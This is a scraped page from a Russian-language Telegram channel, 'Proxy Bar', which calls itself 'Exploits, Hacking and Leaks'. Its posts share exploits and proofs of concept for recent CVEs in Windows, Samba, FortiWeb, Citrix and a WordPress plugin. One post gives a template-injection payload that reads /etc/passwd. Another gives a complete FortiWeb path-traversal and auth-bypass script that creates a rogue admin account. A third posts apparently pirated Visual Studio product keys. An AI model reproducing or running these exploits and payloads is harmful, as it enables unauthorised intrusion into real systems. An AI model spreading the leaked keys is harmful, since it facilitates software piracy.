Proxy Bar – Telegram
Proxy Bar
19.6K subscribers
1.29K photos
76 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
ясно
👍23🔥3
Visual Studio 2026 is here
Keys:
Professional: NVTDK-QB8J9-M28GR-92BPC-BTHXK
Enterprise: VYGRN-WPR22-HG4X3-692BF-QGT2V
🔥60👍9😱5
Видишь на сайте выбор Language, не поленись !
Language={${system("cat+/etc/passwd")}}
👍71🔥31😱23
CVE-2025-60710
*
LPE в \Microsoft\Windows\WindowsAI\Recall\PolicyConfiguration scheduled task.
*
POC


#win #lpe
👍17🔥7😱3
CVE-2025-26686
*
RCE in Windows 10/11/Srv
*
The-TCP-IP-Flaw-That-Opens-the-Gates
😱25👍13🔥4
вдруг вам надо
PE-XRay-EDR
🔥18👍7😱3
CVE-2025-10230 (CVSS 10) ну это успех
*
Несанкционированные NetBIOS имена регистрационных пакетов WINS передаются в оболочку без экранирования
Неаутентифицированный сетевой злоумышленник выполняет RCE в качестве процесса Samba на контроллерах домена Active Directory.
🔥58😱14👍2
Fortinet FortiWeb
*
auth bypass vuln
*
check vuln
🔥21👍5😱3
CVE-2025-33073
*
POC я уже публиковал, а тут универсалочка подъехала.

Universal exploit

#win #DC #controller
👍17🔥12😱4
CVE-2025-12101 + CVE-2025-21202
*
Citrix NetScaler ADC and Citrix NetScaler Gateway
*
exploit +xss tool
👍11😱3🔥1
CVE-2025-64446 FortiWeb Unauthenticated RCE via Path Traversal and CGI Auth Bypass
*
Ну то есть исходя из ЭТОГО
можно получить такое:
python3 - <<'PY'
import base64, json, subprocess
header = base64.b64encode(json.dumps({
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}).encode()).decode()

payload = json.dumps({
"data": {
"q_type": 1,
"name": "note2",
"access-profile": "prof_admin",
"password": "note2",
"comment": "automated RCE"
}
})

cmd = [
"curl", "--path-as-is", "-sk",
"-H", f"CGIINFO: {header}",
"-H", "Content-Type: application/json",
"--data", payload,
"https://localhost:38443/api/v2.0/cmdb/system/admin%3f/../../../cgi-bin/fwbcgi"
]
print(subprocess.run(cmd, capture_output=True, text=True).stdout)
PY

Output from the box:

{ "results": { "name": "note2", "access-profile": "prof_admin", ... } }


То есть просто получаем нового админа
🔥40👍3
CVE-2025-59118: Critical Apache OFBiz
*
RCE
*
Full Server Compromise
🔥13👍7
This media is not supported in your browser
VIEW IN TELEGRAM
13:17 пробило
а вот и ОН
happy birthday
день рождения )))
дамы и господа - нам 4 года
*
Если пересказать = многое было, я бы многое изменил, но вышло так как вышло, ну и хорошо.
*|
С днем рождения НАС )))) начнем в 13:17 ))))
Ну, и все как всегда - берегите себя и своих близких ! ))))

Donate^
Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker

С днем нас рождения ))))
👍119🔥80😱4
гоу, увидимся внутри !
👍17🔥13
CVE-2025-6389
is a Critical (CVSS 9.8) vulnerability
in the Sneeit Framework WordPress plugin (≤ 8.3)
exploit

#wordpress
👍16🔥1
Forwarded from Freedom Fox 🏴‍☠
20.11.2025г 00:00 СПБ.

Возрождение, легендарного канала по свободному распространению информации!!! 🏴‍☠
Наши убеждения не выпадают вместе с зубами
🦊

#А_ты_уже_с_нами

«Проект Наследие»

https://news.1rj.ru/str/freedomfox
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥27👍9
This media is not supported in your browser
VIEW IN TELEGRAM
Внедрение DLL в процесс проводника с помощью иконок
*
IconJector
🔥35👍4
крутой сайт !
https://chiptune.app/browse
👍20🔥15😱2